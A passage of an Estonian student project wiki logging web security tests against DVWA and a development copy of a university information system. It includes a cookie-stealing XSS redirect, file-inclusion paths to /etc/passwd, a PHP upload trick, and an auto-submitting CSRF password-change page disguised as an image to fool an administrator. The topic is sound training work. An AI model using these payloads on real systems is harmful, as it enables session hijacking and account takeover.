 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
